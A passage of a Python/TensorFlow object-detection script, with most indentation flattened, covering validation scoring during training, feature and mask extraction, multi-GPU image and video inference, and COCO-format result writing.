boxes, labels, probs, actsingleboxes, actsinglelabels = outputs[i]
actsingleboxes = actsingleboxes / scale
else:
boxes, labels, probs, actboxes, actlabels,actprobs = outputs[i]
actboxes = actboxes / scale
else:
if config.add_mask:
boxes, labels, probs, masks = outputs[i]
else:
if config.use_small_object_head:
boxes, labels, probs, so_boxes, so_labels, so_probs = outputs[i]
so_boxes = so_boxes / scale
else:
boxes, labels, probs = outputs[i]
if config.use_cpu_nms:
boxes, labels, probs = nms_wrapper(boxes, probs, config)
val_batch = val_batches[i]
boxes = boxes / scale
# each class's detection box and prob
target_dt_boxes = gather_dt(boxes,probs,labels,eval_target,targetid2class,tococo=config.tococo,coco_class_names=config.class_names)
# gt
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_boxes = gather_gt(anno['boxes'],anno['labels'],eval_target,targetid2class)
# gt_boxes and target_dt_boxes for this image
# eval on one single image
match_dt_gt(e,imgid,target_dt_boxes,gt_boxes,eval_target)
if config.use_small_object_head:
target_so_dt_boxes = gather_dt(so_boxes, so_probs, so_labels, config.so_eval_target, config.small_objects_targetid2class)
anno = val_batch.data['gt'][0] # one val_batch is single image
small_object_classids = [targetClass2id[one] for one in config.small_objects]
                                idxs = [i for i in range(len(anno['labels'])) if anno['labels'][i] in small_object_classids]
gt_so_boxes = [anno['boxes'][i] for i in idxs]
# convert the original classid to the small object class id
gt_so_labels = [small_object_classids.index(anno['labels'][i])+1 for i in idxs]
gt_so_boxes = gather_gt(gt_so_boxes, gt_so_labels, config.so_eval_target, config.small_objects_targetid2class)
match_dt_gt(e_so, imgid, target_so_dt_boxes, gt_so_boxes, config.so_eval_target)
# eval the act box as well, put stuff in e_act
if config.add_act and config.act_v2:
# for v2, we have the single and pair boxes
# actsingleboxes [K,4]
# actsinglelabels [K,num_act_class]
# first we filter the BG boxes
topk=config.act_single_topk # we select topk act class for each box
single_act_boxes,single_act_labels,single_act_probs = gather_act_singles(actsingleboxes,actsinglelabels,topk)
target_act_dt_boxes = gather_dt(single_act_boxes,single_act_probs,single_act_labels,act_eval_target,targetsingleactid2class)
                                # to collect the ground truth, each label becomes a stand-alone box
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_single_act_boxes = []
gt_single_act_labels = []
gt_obj_boxes = anno['boxes']
for bid,label in zip(anno['actSingleIdxs'],anno['actSingleLabels']):
if label in act_eval_target:
gt_single_act_boxes.append(gt_obj_boxes[bid])
gt_single_act_labels.append(targetSingleAct2id[label])
gt_act_boxes = gather_gt(gt_single_act_boxes,gt_single_act_labels,act_eval_target,targetsingleactid2class)
match_dt_gt(e_act,imgid,target_act_dt_boxes,gt_act_boxes,act_eval_target)
if config.add_act and not config.act_v2:
target_act_dt_boxes = gather_dt(actboxes,actprobs,actlabels,act_eval_target,targetactid2class)
#gt
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_act_boxes = gather_gt(anno['actboxes'],anno['actlabels'],act_eval_target,targetactid2class)
# gt_boxes and target_dt_boxes for this image
match_dt_gt(e_act,imgid,target_act_dt_boxes,gt_act_boxes,act_eval_target)
# we have the dm and g matching for each image in e & e_act
# max detection per image per category
aps,ars = aggregate_eval(e,maxDet=100)
aps_str = "|".join(["%s:%.5f"%(class_,aps[class_]) for class_ in aps])
ars_str = "|".join(["%s:%.5f"%(class_,ars[class_]) for class_ in ars])
#tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, previous best AR for %s at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,eval_best,best[1],best[0]))
#validation_performance = ars[eval_best]
# now we use average AR and average AP or weighted
average_ap,average_ar = weighted_average(aps,ars,eval_target_weight)
ap_weight = 1.0
ar_weight = 0.0
validation_performance = average_ap*ap_weight + average_ar*ar_weight
if config.add_act:
obj_validation_performance = validation_performance
aps,ars = aggregate_eval(e_act,maxDet=100)
act_aps_str = "|".join(["%s:%.5f"%(class_,aps[class_]) for class_ in aps])
act_ars_str = "|".join(["%s:%.5f"%(class_,ars[class_]) for class_ in ars])
average_ap,average_ar = weighted_average(aps,ars,act_eval_target_weight)
ap_weight = 0.9
ar_weight = 0.1
act_validation_performance = average_ap*ap_weight + average_ar*ar_weight
act_perf_weight = 0.5
obj_perf_weight = 0.5
validation_performance = obj_perf_weight*obj_validation_performance + act_perf_weight*act_validation_performance
tqdm.write("\tval in %s at step %s, Obj AP:%s, AR:%s, obj performance %s"%(num_val_steps,global_step,aps_str,ars_str,obj_validation_performance))
tqdm.write("\tAct AP:%s, AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(act_aps_str,act_ars_str,validation_performance,best[1],best[0]))
else:
if config.use_small_object_head:
so_aps, so_ars = aggregate_eval(e_so, maxDet=100)
so_average_ap, so_average_ar = weighted_average(so_aps, so_ars)
so_val = so_average_ap*0.5 + so_average_ar*0.5
so_weight = 0.5
validation_performance = (1 - so_weight)*validation_performance + so_weight*so_val
so_aps_str = "|".join(["%s:%.5f"%(class_,so_aps[class_]) for class_ in so_aps])
so_ars_str = "|".join(["%s:%.5f"%(class_,so_ars[class_]) for class_ in so_ars])
tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, so_AP:%s, so_AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,so_aps_str,so_ars_str,validation_performance,best[1],best[0]))
else:
tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,validation_performance,best[1],best[0]))
if validation_performance > best[0]:
tqdm.write("\tsaving best model %s..."%global_step)
bestsaver.save(sess,os.path.join(config.save_dir_best,"model"),global_step=global_step)
tqdm.write("\tdone")
best = (validation_performance,global_step)
isStart = False
if config.exit_after_val:
print("exit after eval.")
break
# skip if the batch is not complete, usually the last few ones
if len(batch[1]) != config.gpu:
continue
try:
#loss, rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op,act_losses = trainer.step(sess,batch)
loss, wds, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses, lr = trainer.step(sess,batch)
except Exception as e:
print(e)
bs = batch[1]
print("trainer error, batch files:%s"%([b.data['imgs'] for b in bs]))
sys.exit()
if math.isnan(loss):
tqdm.write("warning, nan loss: loss:%s,rpn_label_loss:%s, rpn_box_loss:%s, fastrcnn_label_loss:%s, fastrcnn_box_loss:%s"%(loss, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses))
if config.add_act:
tqdm.write("\tact_losses:%s"%(act_losses))
print("batch:%s"%(batch[1][0].data['imgs']))
sys.exit()
# use moving average to compute loss
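                # FIFO_ME is assumed to be a fixed-length FIFO (config.loss_me_step entries) whose .me() returns the mean of its current contents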
loss_me.put(loss)
lr_me.put(lr)
for wd, rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, so_label_loss, act_loss in zip(wds, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses):
wd_me.put(wd)
rpn_label_loss_me.put(rpn_label_loss)
rpn_box_loss_me.put(rpn_box_loss)
fastrcnn_label_loss_me.put(fastrcnn_label_loss)
fastrcnn_box_loss_me.put(fastrcnn_box_loss)
so_label_loss_me.put(so_label_loss)
act_loss_me.put(act_loss)
if global_step % config.show_loss_period == 0:
tqdm.write("step %s, moving average: learning_rate %.6f, loss %.6f, weight decay loss %.6f, rpn_label_loss %.6f, rpn_box_loss %.6f, fastrcnn_label_loss %.6f, fastrcnn_box_loss %.6f, so_label_loss %.6f, act_loss %.6f" % (global_step, lr_me.me(), loss_me.me(), wd_me.me(), rpn_label_loss_me.me(), rpn_box_loss_me.me(), fastrcnn_label_loss_me.me(), fastrcnn_box_loss_me.me(), so_label_loss_me.me(), act_loss_me.me()))
                # save these for plotting later
stats.append({
"s":float(global_step),
"l":float(loss),
"val":validation_performance
})
isStart = False
# save the last model
        if global_step % config.save_period != 0: # the last step did not land on a save boundary
print("saved last model without evaluation.")
saver.save(sess,os.path.join(config.save_dir,"model"),global_step=global_step)
if config.write_self_sum:
self_summary_strs.writeTo(config.self_summary_path)
with open(config.stats_path,"w") as f:
json.dump(stats,f)
# given the box, extract feature
def boxfeat(config):
imagelist = config.imgpath
images = [line.strip() for line in open(config.imgpath,"r").readlines()]
print("total images to test:%s"%len(images))
if not os.path.exists(config.boxfeatpath):
os.makedirs(config.boxfeatpath)
model = get_model_boxfeat(config) # input image -> final_box, final_label, final_masks
add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
    tfconfig.gpu_options.allow_growth = True # only allocate the necessary GPU memory instead of grabbing it all
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.8
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
#count=0
for image in tqdm(images,ascii=True):
imagename = os.path.splitext(os.path.basename(image))[0]
with open(os.path.join(config.boxjsonpath,imagename+".json"),"r") as f:
this_data = json.load(f)
boxes = np.asarray(this_data['boxes'],dtype="float") # should be a [K,4] , x,y,w,h
# -> x1,y1,x2,y2
boxes[:, 2] = boxes[:,2] + boxes[:,0]
boxes[:, 3] = boxes[:,3] + boxes[:,1]
feed_dict = model.get_feed_dict(image,boxes)
if config.boxclass:
feature, label_probs = sess.run([model.feature,model.label_probs],feed_dict=feed_dict)
else:
feature, = sess.run([model.feature],feed_dict=feed_dict)
assert len(feature) == len(boxes)
# for debug
"""
            print(feature.shape)
            print(label_probs.shape)
            for i,label_prob in enumerate(label_probs):
                print(label_prob.shape)
                label = np.argmax(label_prob)
                cat_name = config.class_names[label]
                ori_cat_name = this_data['cat_names'][i]
                ori_cat_id = config.class_to_classId[ori_cat_name]
                print("argmax label index:%s, cat_name:%s,logit:%s"%(label,cat_name,label_prob[label]))
                if label == 0: # 0 is BG, let's get second largest
                    label2 = label_prob.argsort()[-2:][::-1][1]
                    print("argmax 2nd label index:%s, cat_name:%s,logit:%s"%(label2,config.class_names[label2],label_prob[label2]))
                print("original label cat_name:%s,cat_id:%s,cur_logits:%s"%(ori_cat_name,ori_cat_id,label_prob[ori_cat_id]))
sys.exit()
"""
np.save(os.path.join(config.boxfeatpath,imagename+".npy"),feature)
# given the box/box_label/box_prob, extract the mask
def givenbox(config):
imagelist = config.imgpath
images = [line.strip() for line in open(config.imgpath,"r").readlines()]
print("total images to test:%s"%len(images))
if not os.path.exists(config.outbasepath):
os.makedirs(config.outbasepath)
model = get_model_givenbox(config)
add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
tfconfig.gpu_options.allow_growth = True
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
for image in tqdm(images,ascii=True):
imagename = os.path.splitext(os.path.basename(image))[0]
with open(os.path.join(config.boxjsonpath,imagename+".json"),"r") as f:
this_data = json.load(f) # this is the same output from mask rcnn
def gather_data(box_list):
boxes,box_labels,box_probs = [],[],[]
for one in box_list:
boxes.append(one['bbox'])
box_probs.append(one['score'])
box_classId = config.class_to_classId[one['cat_name']] # [0-80]
assert box_classId > 0, one
box_labels.append(box_classId)
boxes = np.asarray(boxes,dtype="float")
box_labels = np.asarray(box_labels,dtype="int")
box_probs = np.asarray(box_probs,dtype="float")
return boxes, box_labels,box_probs
boxes, box_labels,box_probs = gather_data(this_data)
if boxes.shape[0] == 0:
continue
# boxes should be a [K,4] , x,y,w,h
# -> x1,y1,x2,y2
boxes[:, 2] = boxes[:,2] + boxes[:,0]
boxes[:, 3] = boxes[:,3] + boxes[:,1]
# resized the image and box input
feed_dict,ori_shape,scale = model.get_feed_dict(image,boxes,box_labels,box_probs)
final_boxes,final_labels,final_probs,final_masks = sess.run([model.final_boxes,model.final_labels,model.final_probs,model.final_masks],feed_dict=feed_dict)
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
pred = []
for box, prob, label, mask in zip(final_boxes,final_probs,final_labels,final_masks):
box[2] -= box[0]
box[3] -= box[1] # produce x,y,w,h output
cat_id = config.classId_to_cocoId[label]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:,:,None],order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"category_id":cat_id,
"cat_name":config.class_names[label], #[0-80]
"score":float(round(prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle
}
pred.append(res)
# save the data
resultfile = os.path.join(config.outbasepath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(pred,f)
# given a list of images, do the forward, save each image result separately
def forward(config):
imagelist = config.imgpath
if config.extract_feat:
assert config.feat_path is not None
assert config.is_fpn
if not os.path.exists(config.feat_path):
os.makedirs(config.feat_path)
print("also extracting fpn features")
all_images = [line.strip() for line in open(config.imgpath,"r").readlines()]
if config.forward_skip > 1:
all_images.sort()
ori_num = len(all_images)
all_images = all_images[::config.forward_skip]
print("skiiping %s, got %s/%s"%(config.forward_skip, len(all_images), ori_num))
if config.check_img_exist:
exist_imgs = []
for image in all_images:
if os.path.exists(image):
exist_imgs.append(image)
print("%s/%s image exists" % (len(exist_imgs), len(all_images)))
all_images = exist_imgs
print("total images to test:%s"%len(all_images))
if config.use_small_object_head:
if not os.path.exists(config.so_outpath):
os.makedirs(config.so_outpath)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
    for i in range(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config, i, controller=config.controller))
model_final_boxes = [model.final_boxes for model in models]
# [R]
model_final_labels = [model.final_labels for model in models]
model_final_probs = [model.final_probs for model in models]
if config.extract_feat:
model_feats = [model.fpn_feature for model in models]
if config.add_mask:
# [R,14,14]
model_final_masks = [model.final_masks for model in models]
if config.add_act:
if config.act_v2:
model_act_single_boxes = [model.act_single_boxes for model in models]
model_act_single_label_logits = [model.act_single_label_logits for model in models]
else:
model_act_final_boxes = [model.act_final_boxes for model in models]
# [R]
model_act_final_labels = [model.act_final_labels for model in models]
model_act_final_probs = [model.act_final_probs for model in models]
#if not config.diva_class and not config.diva_class2 and not config.diva_class3:
# add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
if not config.use_all_mem:
        tfconfig.gpu_options.allow_growth = True # only allocate the necessary GPU memory instead of grabbing it all
tfconfig.gpu_options.visible_device_list = "%s"%(",".join(["%s"%i for i in range(config.gpuid_start, config.gpuid_start+config.gpu)])) # so only this gpu will be used
with tf.Session(config=tfconfig) as sess:
# for packing model, the weights are already loaded
if not config.is_load_from_pb:
initialize(load=True, load_best=config.load_best, config=config, sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
count=0
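        # grouper() is assumed to be the usual itertools grouper recipe: fixed-size chunks with the last one padded with None, hence the "is not None" filter below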
for images in tqdm(grouper(all_images,config.im_batch_size),ascii=True):
count+=1
if config.start_from > 0:
if count <= config.start_from:
continue
images = [im for im in images if im is not None]
            # multi-gpu needs a full batch of images as input
this_batch_len = len(images)
if this_batch_len != config.im_batch_size:
need = config.im_batch_size - this_batch_len
images.extend(all_images[:need]) # redo some images
scales = []
resized_images = []
ori_shapes = []
imagenames = []
pathnames = [] # the folder the image is in, for when we want a two-level output
feed_dict = {}
for i,image in enumerate(images):
im = cv2.imread(image,cv2.IMREAD_COLOR)
imagename = os.path.splitext(os.path.basename(image))[0]
pathnames.append(image.split("/")[-2])
imagenames.append(imagename)
ori_shape = im.shape[:2]
# need to resize here, otherwise
# InvalidArgumentError (see above for traceback): Expected size[1] in [0, 83], but got 120 [[Node: anchors/fm_anchors = Slice[Index=DT_INT32, T=DT_FLOAT, _device="/job:localhost/replica:0/task:0/device:GPU:0"](anchors/all_anchors, anchors/fm_anchors/begin, anchors/stack)]]
resized_image = resizeImage(im,config.short_edge_size,config.max_size)
scale = (resized_image.shape[0]*1.0/im.shape[0] + resized_image.shape[1]*1.0/im.shape[1])/2.0
resized_images.append(resized_image)
scales.append(scale)
ori_shapes.append(ori_shape)
feed_dict.update(models[i].get_feed_dict_forward(resized_image))
sess_input = []
if config.just_feat:
outputs = sess.run(model_feats,feed_dict=feed_dict)
for i,feat in enumerate(outputs):
imagename = imagenames[i]
featfile = os.path.join(config.feat_path, "%s.npy"%imagename)
np.save(featfile, feat)
continue # no bounding boxes
if config.add_mask:
for _,boxes,labels,probs,masks in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_final_masks):
sess_input+=[boxes,labels,probs,masks]
else:
if config.add_act:
if config.act_v2:
for _,boxes,labels,probs,actboxes,actlabels in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_act_single_boxes,model_act_single_label_logits):
sess_input+=[boxes,labels,probs,actboxes,actlabels]
else:
for _,boxes,labels,probs,actboxes,actlabels,actprobs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_act_final_boxes,model_act_final_labels,model_act_final_probs):
sess_input+=[boxes,labels,probs,actboxes,actlabels,actprobs]
else:
if config.extract_feat:
for _,boxes,labels,probs,feats in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_feats):
sess_input+=[boxes,labels,probs,feats]
else:
if config.get_rpn_out:
model_proposal_boxes = [model.proposal_boxes for model in models]
model_proposal_scores = [model.proposal_scores for model in models]
for _, boxes, labels, probs, prop_boxes, prop_scores in zip(range(len(images)), model_final_boxes, model_final_labels, model_final_probs, model_proposal_boxes, model_proposal_scores):
sess_input += [boxes, labels, probs, prop_boxes, prop_scores]
else:
if config.use_small_object_head:
model_so_boxes = [model.so_final_boxes for model in models]
model_so_probs = [model.so_final_probs for model in models]
model_so_labels = [model.so_final_labels for model in models]
for _, boxes, labels, probs, so_boxes, so_labels, so_probs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs, model_so_boxes,model_so_labels, model_so_probs):
sess_input += [boxes, labels, probs, so_boxes, so_labels, so_probs]
else:
for _,boxes,labels,probs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs):
sess_input+=[boxes,labels,probs]
outputs = sess.run(sess_input,feed_dict=feed_dict)
if config.add_mask:
pn = 4
else:
pn = 3
if config.add_act:
pn=6
if config.act_v2:
pn=5
else:
if config.extract_feat:
pn=4
elif config.get_rpn_out:
pn=5
elif config.use_small_object_head:
pn=6
            outputs = [outputs[i*pn:(i*pn+pn)] for i in range(len(images))]
for i,output in enumerate(outputs):
scale = scales[i]
ori_shape = ori_shapes[i]
imagename = imagenames[i]
if config.add_mask:
final_boxes, final_labels, final_probs, final_masks = output
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
else:
if config.add_act:
if config.act_v2:
final_boxes, final_labels, final_probs,actsingleboxes,actsinglelabels = output
actsingleboxes = actsingleboxes / scale
else:
final_boxes, final_labels, final_probs,actboxes,actlabels,actprobs = output
actboxes = actboxes / scale
else:
if config.extract_feat:
final_boxes, final_labels, final_probs, final_feat = output
#print(final_feats.shape# [1,7,7,256]
# save the features
featfile = os.path.join(config.feat_path, "%s.npy"%imagename)
np.save(featfile, final_feat)
else:
if config.get_rpn_out:
final_boxes, final_labels, final_probs, prop_boxes, prop_scores = output
prop_boxes = prop_boxes / scale
props = np.concatenate([prop_boxes, np.expand_dims(prop_scores, axis=-1)], axis=-1) # [K, 5]
# save the proposal boxes,
prop_file = os.path.join(config.rpn_out_path, "%s.npy"%imagename)
np.save(prop_file, props)
else:
if config.use_small_object_head:
final_boxes, final_labels, final_probs, final_so_boxes, final_so_labels, final_so_probs = output
else:
final_boxes, final_labels, final_probs = output
if config.use_cpu_nms:
if not config.no_nms:
final_boxes, final_labels, final_probs = nms_wrapper(final_boxes, final_probs, config)
final_boxes = final_boxes / scale
final_masks = [None for one in final_boxes]
if config.no_nms:
# will leave all K boxes, each box class is the max prob class
# final_boxes would be [num_class-1, K, 4]
# final_probs would be [num_class-1, K]
# final_labels is actually rcnn_boxes, [K, 4]
if config.save_all_box: # save all output as npz file instead
rcnn_boxes = final_labels
rcnn_boxes = rcnn_boxes / scale
# boxes are [x1, y1, x2, y2]
if config.use_frcnn_class_agnostic:
if len(final_boxes) > 0:
assert final_boxes[0, 1, 2] == final_boxes[1, 1, 2]
final_boxes = final_boxes[0, :, :] # [K, 4]
data = {
"rcnn_boxes": rcnn_boxes, # [K, 4]
"frcnn_boxes": final_boxes, # [C, K, 4] / [K, 4]
"frcnn_probs": final_probs, # [C, K] # C is num_class -1
}
target_file = os.path.join(config.outbasepath, "%s.npz"%imagename)
np.savez(target_file, **data)
continue # next image
else:
num_cat, num_box = final_boxes.shape[:2]
# [K]
best_cat = np.argmax(final_probs, axis=0)
# get the final labels first
final_labels = best_cat + 1
# use the final boxes, select the best cat for each box
final_boxes2 = np.zeros([num_box, 4], dtype="float")
                                    for k in range(num_box):  # use k so the outer image index i is not clobbered
                                        final_boxes2[k, :] = final_boxes[best_cat[k], k, :]
final_boxes = final_boxes2
final_probs = np.amax(final_probs, axis=0) # [K]
final_masks = [None for one in final_boxes]
pred = []
for j,(box, prob, label, mask) in enumerate(zip(final_boxes,final_probs,final_labels,final_masks)):
box[2] -= box[0]
box[3] -= box[1] # produce x,y,w,h output
cat_id = int(label)
cat_name = targetid2class[cat_id]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:, :, None], order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"category_id":cat_id,
"cat_name":cat_name, # [0-80]
"score":float(round(prob, 4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle,
}
pred.append(res)
# save the data
outbasepath = config.outbasepath
if config.use_two_level_outpath:
pathname = pathnames[i]
outbasepath = os.path.join(config.outbasepath, pathname)
if not os.path.exists(outbasepath):
os.makedirs(outbasepath)
resultfile = os.path.join(outbasepath, "%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(pred,f)
if config.use_small_object_head:
so_pred = []
for j,(so_box, so_prob, so_label) in enumerate(zip(final_so_boxes, final_so_probs, final_so_labels)):
so_box[2] -= so_box[0]
so_box[3] -= so_box[1] # produce x,y,w,h output
# so_label is the class id in the small objects,
# here the cat_id should follow the original class
cat_name = config.small_objects_targetid2class[so_label]
cat_id = targetClass2id[cat_name]
res = {
"category_id": cat_id,
"cat_name": cat_name,
"score": float(round(so_prob, 4)),
"bbox": list(map(lambda x:float(round(x,1)), so_box)),
"segmentation": None,
}
so_pred.append(res)
resultfile = os.path.join(config.so_outpath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(so_pred,f)
if config.add_act:
act_pred = []
if config.act_v2:
# assemble the single boxes and pair boxes?
topk=config.act_single_topk
single_act_boxes,single_act_labels,single_act_probs = gather_act_singles(actsingleboxes,actsinglelabels,topk)
for j,(act_box, act_prob, act_label) in enumerate(zip(single_act_boxes,single_act_probs,single_act_labels)):
act_box[2] -= act_box[0]
act_box[3] -= act_box[1]
act_name = targetsingleactid2class[act_label]
res = {
"category_id":act_label,
"cat_name":act_name,
"score":float(round(act_prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),act_box)),
"segmentation":None,
"v2":1,
"single":1,
}
act_pred.append(res)
else:
for j,(act_box, act_prob, act_label) in enumerate(zip(actboxes,actprobs,actlabels)):
act_box[2] -= act_box[0]
act_box[3] -= act_box[1]
act_name = targetactid2class[act_label]
res = {
"category_id":act_label,
"cat_name":act_name,
"score":float(round(act_prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),act_box)),
"segmentation":None,
"v2":0,
}
act_pred.append(res)
# save the act data
resultfile = os.path.join(config.actoutbasepath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(act_pred,f)
from glob import glob
# only get fpn backbone feature for each video, no object detection
def videofeat(config):
assert config.feat_path is not None
assert config.is_fpn
assert config.videolst is not None
if not os.path.exists(config.feat_path):
os.makedirs(config.feat_path)
# imgpath is the frame path,
# need videolst
# we get all the image first
print("getting imglst...")
imgs = {}# videoname -> frames
total=0
for videoname in [os.path.splitext(os.path.basename(l.strip()))[0] for l in open(config.videolst).readlines()]:
framepath = os.path.join(config.imgpath, "%s"%videoname)
frames = glob(os.path.join(framepath, "*.jpg"))
frames.sort()
frames = frames[::config.forward_skip] # some only have 1-3 frames
imgs[videoname] = frames
total+=len(frames)
print("done, got %s imgs"%total)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
    for i in range(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config,i,controller=config.controller))
model_feats = [model.fpn_feature for model in models]
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if not config.use_all_mem:
        tfconfig.gpu_options.allow_growth = True # only allocate the necessary GPU memory instead of grabbing it all
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.8
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
#count=0
for videoname in tqdm(imgs,ascii=True):
if config.skip:
if os.path.exists(os.path.join(config.feat_path,"%s.npy"%videoname)):
continue
feats = []
for images in tqdm(grouper(imgs[videoname],config.im_batch_size),ascii=True):
images = [im for im in images if im is not None]
                # multi-gpu needs a full batch of images as input
this_batch_len = len(images)
need=0
if this_batch_len != config.im_batch_size:
need = config.im_batch_size - this_batch_len
                    repeats = [imgs[videoname][0] for i in range(need)]
images.extend(repeats) # redo some images
feed_dict = {}
for i,image in enumerate(images):
im = cv2.imread(image,cv2.IMREAD_COLOR)
resized_image = resizeImage(im,config.short_edge_size,config.max_size)
feed_dict.update(models[i].get_feed_dict_forward(resized_image))
sess_input = []
outputs = sess.run(model_feats,feed_dict=feed_dict)
this_feats = []
for i,feat in enumerate(outputs[:len(outputs)-need]): # ignore the repeated ones
this_feats.append(feat)
assert len(this_feats) == this_batch_len
feats.extend(this_feats)
feats = np.array(feats)
# (380, 1, 7, 7, 256)
feats = np.squeeze(feats,axis=1)
feat_file = os.path.join(config.feat_path,"%s.npy"%videoname)
np.save(feat_file, feats)
def read_data_coco(datajson,config,add_gt=False,load_coco_class=False):
with open(datajson,"r") as f:
dj = json.load(f)
if load_coco_class:
add_coco(config,datajson)
data = {"imgs":[],'ids':[]}
if add_gt:
data = {"imgs":[],'ids':[],"gt":[]}
# read coco annotation file
for one in dj['images']:
imgid = int(one['id'])
imgfile = os.path.join(config.imgpath,one['file_name'])
if config.coco2014_to_2017:
imgfile = os.path.join(config.imgpath,one['file_name'].split("_")[-1])
data['imgs'].append(imgfile)
data['ids'].append(imgid)
if add_gt:
# load the bounding box and so on
pass
return Dataset(data,add_gt=add_gt)
# for testing, dataset -> {"imgs":[],'ids':[]}, imgs is the image file path,
def forward_coco(dataset,num_batches,config,sess,tester,resize=True):
assert not config.diva_class # not working for this yet
# "id" -> (boxes, probs, labels, masks)
#pred = {}
# each is (image_id,cat_id,bbox,score,segmentation)
pred = []
for evalbatch in tqdm(dataset.get_batches(config.im_batch_size,num_batches=num_batches,shuffle=False,cap=True),total=num_batches):
_, batches = evalbatch
scales = []
ori_shapes = []
image_ids = []
for batch in batches:
# load the image here and resize
image = cv2.imread(batch.data['imgs'][0],cv2.IMREAD_COLOR)
assert image is not None,batch.data['imgs'][0]
image = image.astype("float32")
imageId = batch.data['ids'][0]
image_ids.append(imageId)
batch.data['imgdata'] = [image]
#if imageId != 139:
# continue
# resize image
            # ppwwyyxx's code does resizing in eval
if resize:
resized_image = resizeImage(image,config.short_edge_size,config.max_size)
else:
resized_image = image
            # remember the scale and original image
ori_shape = image.shape[:2]
#print(image.shape, resized_image.shape
# average H/h and W/w ?
scale = (resized_image.shape[0]*1.0/image.shape[0] + resized_image.shape[1]*1.0/image.shape[1])/2.0
batch.data['resized_image'] = [resized_image]
scales.append(scale)
ori_shapes.append(ori_shape)
outputs = tester.step(sess,evalbatch)
for i,output in enumerate(outputs):
scale = scales[i]
ori_shape = ori_shapes[i]
imgid = image_ids[i]
if config.add_mask:
final_boxes, final_labels, final_probs, final_masks = output
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
else:
final_boxes, final_labels, final_probs = output
final_boxes = final_boxes / scale
final_masks = [None for one in final_boxes]
for box, prob, label, mask in zip(final_boxes,final_probs,final_labels,final_masks):
box[2] -= box[0]
box[3] -= box[1]
cat_id = config.classId_to_cocoId[label]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:,:,None],order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"image_id":imgid,#int
"category_id":cat_id,
"cat_name":config.class_names[label], #[0-80]
"score":float(round(prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle
}
pred.append(res)
#print([(one['category_id'],one['score'],one['bbox']) for one in pred]
#print(imageId
#sys.exit()
return pred
# test on coco dataset
def test(config):
test_data = read_data_coco(config.datajson,config=config,add_gt=False,load_coco_class=True)
print("total testing samples:%s"%test_data.num_examples)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
    for i in range(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config,i,controller=config.controller))
tester = Tester(models,config,add_mask=config.add_mask)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if not config.use_all_mem:
        tfconfig.gpu_options.allow_growth = True # only allocate the necessary GPU memory instead of grabbing it all
